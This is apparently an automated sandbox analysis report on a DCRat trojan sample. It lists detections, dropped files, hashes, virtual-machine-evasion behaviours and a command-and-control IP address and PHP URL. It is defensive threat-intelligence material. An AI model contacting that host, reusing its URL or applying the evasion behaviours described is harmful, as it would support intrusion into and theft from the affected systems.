                                  Software Packing
                                  Proc Filesystem3
                                  File and Directory Discovery
                                  Cloud ServicesCredential API HookingExfiltration Over Alternative ProtocolApplication Layer ProtocolDefacementServerlessNetwork Trust Dependencies
                                  Exploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                                  DLL Side-Loading
                                  /etc/passwd and /etc/shadow157
                                  System Information Discovery
                                  Direct Cloud VM ConnectionsData StagedExfiltration Over Symmetric Encrypted Non-C2 ProtocolWeb ProtocolsInternal DefacementMalvertisingNetwork Topology
                                  Hide Legend

                                  Legend:

                                  • Process
                                  • Signature
                                  • Created File
                                  • DNS/IP Info
                                  • Is Dropped
                                  • Is Windows Process
                                  • Number of created Registry Values
                                  • Number of created Files
                                  • Visual Basic
                                  • Delphi
                                  • Java
                                  • .Net C# or VB.NET
                                  • C, C++ or other language
                                  • Is malicious
                                  • Internet
                                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1345582 Sample: o9jDrpZrgR.exe Startdate: 21/11/2023 Architecture: WINDOWS Score: 100 57 Snort IDS alert for network traffic 2->57 59 Antivirus detection for dropped file 2->59 61 Antivirus / Scanner detection for submitted sample 2->61 63 7 other signatures 2->63 10 o9jDrpZrgR.exe 3 6 2->10         started        process3 file4 45 C:\...\BlockrefBrokerperf.exe, PE32 10->45 dropped 13 wscript.exe 1 10->13         started        process5 signatures6 75 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->75 16 cmd.exe 1 13->16         started        process7 process8 18 BlockrefBrokerperf.exe 3 29 16->18         started        21 conhost.exe 16->21         started        file9 37 C:\Users\user\Desktop\qtmQsFEO.log, PE32 18->37 dropped 39 C:\Users\user\Desktop\pwLIWFpU.log, PE32 18->39 dropped 41 C:\Users\user\Desktop\lGVRPIpa.log, PE32 18->41 dropped 43 16 other malicious files 18->43 dropped 23 cmd.exe 1 18->23         started        process10 signatures11 65 Uses ping.exe to sleep 23->65 67 Uses ping.exe to check the status of other devices and networks 23->67 26 qBJICEqiLNwXNBLrN.exe 14 15 23->26         started        31 conhost.exe 23->31         started        33 PING.EXE 1 23->33         started        35 chcp.com 1 23->35         started        process12 dnsIp13 55 77.91.124.101, 49712, 49713, 49714 ECOTEL-ASRU Russian Federation 26->55 47 C:\Users\user\Desktop\zdaXCUIW.log, PE32 26->47 dropped 49 C:\Users\user\Desktop\vnjhvXId.log, PE32 26->49 dropped 51 C:\Users\user\Desktop\sCEQoKxk.log, PE32 26->51 dropped 53 10 other malicious files 26->53 dropped 69 Multi AV Scanner detection for dropped file 26->69 71 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 26->71 73 Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines) 26->73 file14 signatures15

                                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                  windows-stand
                                  SourceDetectionScannerLabelLink
                                  o9jDrpZrgR.exe65%ReversingLabsByteCode-MSIL.Trojan.Uztuby
                                  o9jDrpZrgR.exe69%VirustotalBrowse
                                  o9jDrpZrgR.exe100%AviraVBS/Runner.VPG
                                  o9jDrpZrgR.exe100%Joe Sandbox ML
                                  SourceDetectionScannerLabelLink
                                  C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe100%AviraHEUR/AGEN.1309961
                                  C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe100%AviraHEUR/AGEN.1309961
                                  C:\Users\user\Desktop\KWPomPtF.log100%AviraHEUR/AGEN.1300079
                                  C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe100%AviraHEUR/AGEN.1309961
                                  C:\Users\user\Desktop\BnwYCmoX.log100%AviraHEUR/AGEN.1300079
                                  C:\Users\user\Desktop\HJnNqbKj.log100%AviraHEUR/AGEN.1300079
                                  C:\Users\user\AppData\Local\Temp\XJsEcPfXWC.bat100%AviraBAT/Runner.IK
                                  C:\Users\user\Desktop\MTqwIPIz.log100%AviraHEUR/AGEN.1300079
                                  C:\Users\user\Desktop\qtmQsFEO.log100%AviraHEUR/AGEN.1300079
                                  C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe100%AviraHEUR/AGEN.1309961
                                  C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe100%AviraHEUR/AGEN.1309961
                                  C:\Users\user\Desktop\pwLIWFpU.log100%AviraHEUR/AGEN.1300079
                                  C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe100%Joe Sandbox ML
                                  C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe100%Joe Sandbox ML
                                  C:\Users\user\Desktop\fNssmckm.log100%Joe Sandbox ML
                                  C:\Users\user\Desktop\jTkAEhsC.log100%Joe Sandbox ML
                                  C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe100%Joe Sandbox ML
                                  C:\Users\user\Desktop\GbOXfjDL.log100%Joe Sandbox ML
                                  C:\Users\user\Desktop\GVjFENOl.log100%Joe Sandbox ML
                                  C:\Users\user\Desktop\lGVRPIpa.log100%Joe Sandbox ML
                                  C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe100%Joe Sandbox ML
                                  C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe100%Joe Sandbox ML
                                  C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe79%ReversingLabsByteCode-MSIL.Trojan.Dcrat
                                  C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe69%VirustotalBrowse
                                  C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe79%ReversingLabsByteCode-MSIL.Trojan.Dcrat
                                  C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe69%VirustotalBrowse
                                  C:\Recovery\qBJICEqiLNwXNBLrN.exe79%ReversingLabsByteCode-MSIL.Trojan.Dcrat
                                  C:\Recovery\qBJICEqiLNwXNBLrN.exe69%VirustotalBrowse
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\qBJICEqiLNwXNBLrN.exe79%ReversingLabsByteCode-MSIL.Trojan.Dcrat
                                  C:\Users\user\AppData\Local\Microsoft\Windows\INetCookies\qBJICEqiLNwXNBLrN.exe69%VirustotalBrowse
                                  C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe79%ReversingLabsByteCode-MSIL.Trojan.Dcrat
                                  C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe69%VirustotalBrowse
                                  C:\Users\user\Desktop\BfMGYDNR.log3%ReversingLabs
                                  C:\Users\user\Desktop\BfMGYDNR.log4%VirustotalBrowse
                                  C:\Users\user\Desktop\BhRGcQzx.log5%ReversingLabs
                                  C:\Users\user\Desktop\BhRGcQzx.log9%VirustotalBrowse
                                  C:\Users\user\Desktop\BnwYCmoX.log8%ReversingLabs
                                  C:\Users\user\Desktop\BnwYCmoX.log13%VirustotalBrowse
                                  C:\Users\user\Desktop\ESwXjeKp.log5%ReversingLabs
                                  C:\Users\user\Desktop\ESwXjeKp.log4%VirustotalBrowse
                                  C:\Users\user\Desktop\GVjFENOl.log5%ReversingLabs
                                  C:\Users\user\Desktop\GVjFENOl.log7%VirustotalBrowse
                                  C:\Users\user\Desktop\GbOXfjDL.log5%ReversingLabs
                                  C:\Users\user\Desktop\GbOXfjDL.log7%VirustotalBrowse
                                  C:\Users\user\Desktop\HJnNqbKj.log34%ReversingLabsByteCode-MSIL.Trojan.Generic
                                  C:\Users\user\Desktop\HJnNqbKj.log33%VirustotalBrowse
                                  C:\Users\user\Desktop\KWPomPtF.log34%ReversingLabsByteCode-MSIL.Trojan.Generic
                                  C:\Users\user\Desktop\KWPomPtF.log33%VirustotalBrowse
                                  C:\Users\user\Desktop\MTqwIPIz.log5%ReversingLabs
                                  C:\Users\user\Desktop\MTqwIPIz.log4%VirustotalBrowse
                                  C:\Users\user\Desktop\NBQmTGPX.log3%ReversingLabs
                                  C:\Users\user\Desktop\NBQmTGPX.log4%VirustotalBrowse
                                  C:\Users\user\Desktop\QJNvoZJT.log3%ReversingLabs
                                  C:\Users\user\Desktop\QJNvoZJT.log4%VirustotalBrowse
                                  C:\Users\user\Desktop\SoilvDeL.log17%ReversingLabs
                                  C:\Users\user\Desktop\SoilvDeL.log9%VirustotalBrowse
                                  C:\Users\user\Desktop\XieCzWia.log5%ReversingLabs
                                  C:\Users\user\Desktop\XieCzWia.log4%VirustotalBrowse
                                  No Antivirus matches
                                  No Antivirus matches
                                  SourceDetectionScannerLabelLink
                                  http://77.91.124.101/imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php0%Avira URL Cloudsafe
                                  http://77.91.1H0%Avira URL Cloudsafe
                                  http://77.91.124.1010%Avira URL Cloudsafe
                                  http://77.91.124.101/imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/Pythontr0%Avira URL Cloudsafe
                                  http://77.91.124.1011%VirustotalBrowse
                                  http://77.91.124.101/imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php0%VirustotalBrowse
                                  http://77.91.124.101/imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/Pythontr1%VirustotalBrowse
                                  No contacted domains info
                                  NameMaliciousAntivirus DetectionReputation
                                  http://77.91.124.101/imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.phptrue
                                  • 0%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  NameSourceMaliciousAntivirus DetectionReputation
                                  http://77.91.124.101/imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrqBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002B9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://77.91.1HqBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  low
                                  http://77.91.124.101qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002B9A000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • 1%, Virustotal, Browse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameBlockrefBrokerperf.exe, 00000005.00000002.2209540037.0000000003A3E000.00000004.00000800.00020000.00000000.sdmp, qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002A81000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    77.91.124.101
                                    unknownRussian Federation
                                    64419ECOTEL-ASRUtrue
                                    Joe Sandbox Version:38.0.0 Ammolite
                                    Analysis ID:1345582
                                    Start date and time:2023-11-21 04:46:04 +01:00
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 7m 23s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:15
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample file name:o9jDrpZrgR.exe
                                    renamed because original name is a hash value
                                    Original Sample Name:c256204deb01c77e21ba17b5e2411245.exe
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winEXE@18/43@0/1
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:Failed
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    TimeTypeDescription
                                    04:47:25API Interceptor773171x Sleep call for process: qBJICEqiLNwXNBLrN.exe modified
                                    No context
                                    No context
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    ECOTEL-ASRUyyoCffXuAe.exeGet hashmaliciousDanaBot, RedLineBrowse
                                    • 77.91.124.149
                                    https://www.google.com/url?q=http%3A%2F%2Fe-stata.ru%2Ftrack%2F3%2Fsource%2Fcampaign-ads%2F%23fyubmg&sa=D&sntz=1&usg=AOvVaw39clRPZwVf2QrSL7oQz10YGet hashmaliciousGRQ ScamBrowse
                                    • 77.91.124.119
                                    http://payoutninja-2102318.haighhouse.com/on?930Get hashmaliciousGRQ ScamBrowse
                                    • 77.91.124.119
                                    https://get-bitcoin-pro.com/Get hashmaliciousUnknownBrowse
                                    • 77.91.124.119
                                    https://telegra.ph/To-go-to-the-site-follow-the-personal-link-in-the-description-5ns636269-11-01Get hashmaliciousGRQ ScamBrowse
                                    • 77.91.124.119
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 77.91.124.154
                                    http://url6724.benefity.sodexo.cz/ls/click?upn=QUhkirpB2TftQx8ZqYfR-2B-2F9b4b10DgDKa9hu1GeKwPVEh7d16IedBzYTffXpEBwERJ115yo-2FbYaFzr-2Fk8kG7CqeAFMoC9-2FWya374fNcODga5kLATGmidRFDcLx0mY8lYX-2FsUpUV71fivljHxcp5hyrg10CivKkrEwWTkJu6fyyk-3DtJBe_XJwWT5SpCU-2FA9typ-2F76-2FKVTtVvwzo6vvOS4M1YJtZYM5BLWusGGW-2BF7rV-2BFDmod7khpmfPZQq-2BtpRe1PzAdI1uNKNhLQ81dPCzL4HfHG8u177lUVhQ4O4nG9ktQpsA5yCPf7DQaYR0p5iuR3HRC5EuSIYPRyvEnCIhKT7OrSnIEInq4fhjLOnR1Oqz-2FEkF3ySrQgqgjXeW7sIvxBe05yOQ-3D-3DGet hashmaliciousGRQ ScamBrowse
                                    • 77.91.124.119
                                    WEXTRACT.EXE.exeGet hashmaliciousMystic Stealer, RedLineBrowse
                                    • 77.91.124.86
                                    file.exeGet hashmaliciousStealc, VidarBrowse
                                    • 77.91.124.154
                                    AXccSFenHt.exeGet hashmaliciousRedLineBrowse
                                    • 77.91.124.55
                                    hx8q0a4Hkn.exeGet hashmaliciousRedLineBrowse
                                    • 77.91.124.86
                                    2cdiEkh0Sx.exeGet hashmaliciousRedLineBrowse
                                    • 77.91.124.86
                                    1TMleppij0.exeGet hashmaliciousRedLineBrowse
                                    • 77.91.124.82
                                    file64b.exeGet hashmaliciousRedLineBrowse
                                    • 77.91.124.86
                                    boostfps.exeGet hashmaliciousRedLineBrowse
                                    • 77.91.124.86
                                    Epaulement.exeGet hashmaliciousRedLineBrowse
                                    • 77.91.124.86
                                    70141CDE965558529B1ADC82862D402149F21443F12F0.exeGet hashmaliciousAmadey, Glupteba, Mystic Stealer, RedLine, SmokeLoaderBrowse
                                    • 77.91.124.86
                                    6eiKgvOR9U.exeGet hashmaliciousAmadey, Glupteba, Mystic Stealer, RedLine, SmokeLoaderBrowse
                                    • 77.91.124.86
                                    O3l8L3C1HI.exeGet hashmaliciousAmadey, Mystic Stealer, RedLine, SmokeLoaderBrowse
                                    • 77.91.124.1
                                    LeO8ZInM75.exeGet hashmaliciousAmadey, Mystic Stealer, RedLine, SmokeLoaderBrowse
                                    • 77.91.124.1
                                    No context
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    C:\Users\user\Desktop\BfMGYDNR.logLabyMod.exeGet hashmaliciousDCRat, zgRATBrowse
                                      jWPW3CjSsa.exeGet hashmaliciousDCRat, zgRATBrowse
                                        6v2t5igkn8.exeGet hashmaliciousDCRat, zgRATBrowse
                                          file.exeGet hashmaliciousDCRatBrowse
                                            68ebff4655ce8e3641602b31a0f12adcd4f5d0813604655a309fd881.exeGet hashmaliciousDCRatBrowse
                                              Sentares_Hack_#U2014_#U043a#U043e#U043f#U0438#U044f.exeGet hashmaliciousDCRatBrowse
                                                LYOTMT26Vl.exeGet hashmaliciousDCRatBrowse
                                                  4J576dHwVU.exeGet hashmaliciousDCRatBrowse
                                                    sw9ofrTPS0.exeGet hashmaliciousDCRatBrowse
                                                      jHednJXHgj.exeGet hashmaliciousDCRatBrowse
                                                        file.exeGet hashmaliciousDCRatBrowse
                                                          file.exeGet hashmaliciousDCRatBrowse
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:ASCII text, with very long lines (881), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):881
                                                            Entropy (8bit):5.900735913753077
                                                            Encrypted:false
                                                            SSDEEP:24:1Y3GTX7pFBlH/ymgRYcqN4mYuRQK2abdfWuGyIsNNCqQO:gYX7pzx/ymbcA4mYu2gVIiNjQO
                                                            MD5:4F233A8A5363F76698236D8D400523EA
                                                            SHA1:20459ED2838E9837554FFDDDF55E5D32566BBCA1
                                                            SHA-256:D43404ABB9FD6937DA29D4D857D8433364F51785C95F4CF885C9591FFEADB756
                                                            SHA-512:9469301FCF4BDC6D9B5A6808E83A9C45D6AD930C8D47925A5FBC5189FBE427B0E5E0F0381B66DB7370E54E6DB24086B684BD42CE238CEF0917FC23CF91EC3AD8
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:M8VqEqmuFb78Z0sr5JrazVql0OMvFtdtub9bCzBHaneIBrcShe5O2tD0St0ze1oV7NO80QoFIjAM1hkJw3NkyP1AYIJT9Mnj8IKxcdbRzzGSt08uJqCkoEhsVOkrGVG55aNtXwqTb6u9IiQhKYKSKC44kcbN3tKetLXSnOXWAsIsTijx8ChsLyu2gTI4UcZrvQQ7L745AxSb4MkC2oP0MbS5aewTFdBhTa6DRmlBIlrXfT8TsGCqNjfT7VhrKkzhwuIdQhuQCOrku5ZHfdk9aVTu5mF6E40iwKlvKfCLVvn914jC5ZLqA0GbbYhnbxLIXJykTo6AaZoprU2BDDAosKi5DJTw7ZthkemrF9sRdLPkLbtHfgjXxgaNl2gJUKDBpGFMsL5EVsLg47tlaMRazVuDEYFMci7TIO5FWgYTlfCEV3ToI4tH2mLTWBITGslxv2YpCoP3x7yTTqsKFaDiyzafDltUYFN24PScfomeozU5x1ApT7OpoD85b2mb55fsu5ZDXPpbyj39ffrLkDBa1hO0RWBnCLjtUmK2b7SDRx1FK9a6Ka013E1NrjwAOCZnAJp3Uztnv7IDpIqR6EdlUszPv7K2KRzPYOFBUhlUrNF66xhj2eEJjxSSTZIXp0cdH2pbDp7ZdI4Gm3S7akApNqqk5xr4YOo0vlzDHFgNhopa3MpaHK7E0xQaMFgP7DAPdDVADP0UEwIiAQqtHRxOQkA8VY0CjQPeoa600pW1Um9Dora6YxIqPv83DXopYxvyhn4kT02c454nk6Tn84owIiO2cDwdArcg1LfAxzmh4qwT1USGDBqdJ9q9ZBIQDYbMdXwZbS0ISG1cv4BHuqZ9A8X2eglwrVdgOj0di3pvLhLCHONeA
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1300992
                                                            Entropy (8bit):5.0586566573608085
                                                            Encrypted:false
                                                            SSDEEP:24576:YJQCx441vcF3iE0npCoc1cQhWdB7in6D+:EQCvvcF3KpS
                                                            MD5:295BF8D9B734730EFA567C8DA9918FE1
                                                            SHA1:09AABC018DA124BD0EBE8E1043860015AC71AA34
                                                            SHA-256:7B17102103AF932A56EAC5EA51F07A7926BE23585D19B1CFE42215CE1A4FA3CC
                                                            SHA-512:C816F7F53F5FB24EB7DCF31B8138E6717C881245D7CC2FBD53F5DC99977F8D1CEF4D1AFE8235B5EF0EE4397CE32A1A74720349B21D805A7F6CEAC8BBC802A59C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files (x86)\Microsoft.NET\RedistList\conhost.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 79%
                                                            • Antivirus: Virustotal, Detection: 69%, Browse
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. .......................@............@.....................................K.......p.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc....... ......................@..B........................H.......T...\...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:ASCII text, with very long lines (819), with no line terminators
                                                            Category:dropped
                                                            Size (bytes):819
                                                            Entropy (8bit):5.889288515938023
                                                            Encrypted:false
                                                            SSDEEP:12:MTMEng4c8lklC6j5qLCumELxLYwwCcbuUTwjmCT1ERlcIxP1AUzmKA0Qm6L2n:MTMEnnRilCFmuswrcbNEXSxOq0k
                                                            MD5:0E2911B74AD30D7652057A3D560EFDF7
                                                            SHA1:C7BF5BCED785DF074368FD3ED6BB7DE4223690BD
                                                            SHA-256:2E33E968A2F0DE4FC38500DBCDD4747AF4E667C833FDB95F1F530FF0756B5A9E
                                                            SHA-512:1BBB04D5845818B0A7448287F6AF93A22CA12E23F4D7677F47DEF30B8776354B7E65FA55DF799D8026AE572431A9813103BD254189A0F24C25103B44AF5427B1
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:H2mzUNXYzm6RL6AS9OcNZhOPOGTQits79tVsuCZCGlp4pbuabuCDyuYjoXkO3HzG39SckRh7yaHy2TkwV3zxqpIOUvEXbLJ8vjAqIS0JNFOYnkrUxy2ASCZO0DHyNKgnRICSS3oDDpklaultEtjmSIqtJwzFKB5DjlHeiYB3Kz7mbyyGbYuek3VIcSIgEi3BuhBzmHLprpcdLDSV7towQbcqP9CPQfzl5523w9dUMFw4a16YAxjU4GvSFVjnF6ZM01hQLYi7QTjLphPXCnOc6frzKjyaazPPqjEjUqNlOlEkgjnhGLlbr6QVJsGlkIhaEUfFdqDVZmOUaGSk6QUOOxhtTtZlkmBGEngMEiEZIPBFs54DafpUxTMQwvvtRbvxlHQxkFgYL5G8vcBXyVLE7rSvaPaSwUIqeOdkpGdU9RI2NOfTuY45Qq04zfWUpNl1xZeg9ass20FqiaiMuGiXZMaxYivKtIpvpQFxt8UTpMCZlJVY7KkipObk8qIapi8tKTBRVudwwOrMJAMONWNjiHGazeyCz4nHOTPRIDDMrxwbgOa8e3NTUZLDNkc05a62kj80v5FJTA2uUp4kE0i5rUwyILEilMRQ1406QjNjxD9Ugashp2vF1ALPxJsj0hhHtl3ay8Uen9InVcRrcg3taMY0tkJG1nsQf2l5gStqhQb22h4U1AGUoyqhMDrOzOn9Q1Hc1WLKxMLJug7LpyO0gXmrLEtcke1TnblBacdfy6hbnhwqFgiA9xd3OaQxnsjSU1gS46uNUsBk0LDoRDXE50Uz8swALq2FWOGwAevIvVpQv2CDWmf
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1300992
                                                            Entropy (8bit):5.0586566573608085
                                                            Encrypted:false
                                                            SSDEEP:24576:YJQCx441vcF3iE0npCoc1cQhWdB7in6D+:EQCvvcF3KpS
                                                            MD5:295BF8D9B734730EFA567C8DA9918FE1
                                                            SHA1:09AABC018DA124BD0EBE8E1043860015AC71AA34
                                                            SHA-256:7B17102103AF932A56EAC5EA51F07A7926BE23585D19B1CFE42215CE1A4FA3CC
                                                            SHA-512:C816F7F53F5FB24EB7DCF31B8138E6717C881245D7CC2FBD53F5DC99977F8D1CEF4D1AFE8235B5EF0EE4397CE32A1A74720349B21D805A7F6CEAC8BBC802A59C
                                                            Malicious:true
                                                            Yara Hits:
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, Author: Joe Security
                                                            • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: C:\Program Files\Microsoft Office 15\ClientX64\qBJICEqiLNwXNBLrN.exe, Author: Joe Security
                                                            Antivirus:
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Avira, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                            • Antivirus: ReversingLabs, Detection: 79%
                                                            • Antivirus: Virustotal, Detection: 69%, Browse
                                                            Reputation:low
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..e.........."...................... ........@.. .......................@............@.....................................K.......p.................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...p...........................@..@.reloc....... ......................@..B........................H.......T...\...........................................................P...........W...........S...........[...........Q...........Y...........U.......A...]........@..P...........X...........T.......!...\........ ..R...........Z...........V....................`..P...........W...........S...........[...........Q...........Y...........U.......a...]........`..P...........X...........T.......1...\........0..R...........Z...........V....................`..........................
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:ASCII text, with no line terminators
                                                            Category:dropped
                                                            Size (bytes):197
                                                            Entropy (8bit):5.756222698628844
                                                            Encrypted:false
                                                            SSDEEP:3:cCaa2dMZfGVF0Cdw7zHYQ/EgWSX8FqmRCdxueUuA8auSt+W8NXeSwNaIIiV:cCH2dMZ+P0CS7zd/aSX8Fq7f4d+B68s
                                                            MD5:974B7B5B42C993287DCD9E02BA92818D
                                                            SHA1:EE7B2358B923567506F7E335AB2572E913EACAED
                                                            SHA-256:0539870B91D0C77D2CDCB496A0455B1B59521321ACF4F4AACF61E4143C5BCF10
                                                            SHA-512:41159AC082C7793421FC4833347517B614268B7A7551DF59B11F44D1F5F7DD1452B6E4C4B5CF090192CC156B88275185E6CE7AAA5BDDF84B8479EFA22B8F40D9
                                                            Malicious:false
                                                            Preview:eA344rDa6mUNMEhi1BoxcxUuQTGvrzGhwYVdp8vEHHOaxAAacboWUosrpIokkRtGgxbysE32QkqVi47PSqTPKuNHpnxgUKdzXI3AiMrYhwFt7WJvLYR48e5vjTIEQXiFG18ZA7qF85rYodJSeCU52j03MIaOEmHKOAnGYtuOrL5DwhGGK0kOCmMgAFN2gbBVxhKo0
                                                            Process:C:\reviewruntimeMonitor\BlockrefBrokerperf.exe
                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Category:dropped
                                                            Size (bytes):1300992
                                                            Entropy (8bit):5.0586566573608085
                                                            Encrypted:false
                                                            SSDEEP:24576:YJQCx441vcF3iE0npCoc1cQhWdB7in6D+:EQCvvcF3KpS
                                                            MD5:295BF8D9B734730EFA567C8DA9918FE1
                                                            SHA1:09AABC018DA124BD0EBE8E1043860015AC71AA34
                                                            SHA-256:7B17102103AF932A56EAC5EA51F07A7926BE23585D19B1CFE42215CE1A4FA3CC
                                                            SHA-512:C816F7F53F5FB24EB7DCF31B8138E6717C881245D7CC2FBD53F5DC99977F8D1CEF4D1AFE8235B5EF0EE4397CE32A1A74720349B21D805A7F6CEAC8BBC802A59C
                                                            Malicious:true
                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 79%
                                                            • Antivirus: Virustotal, Detection: 69%, Browse
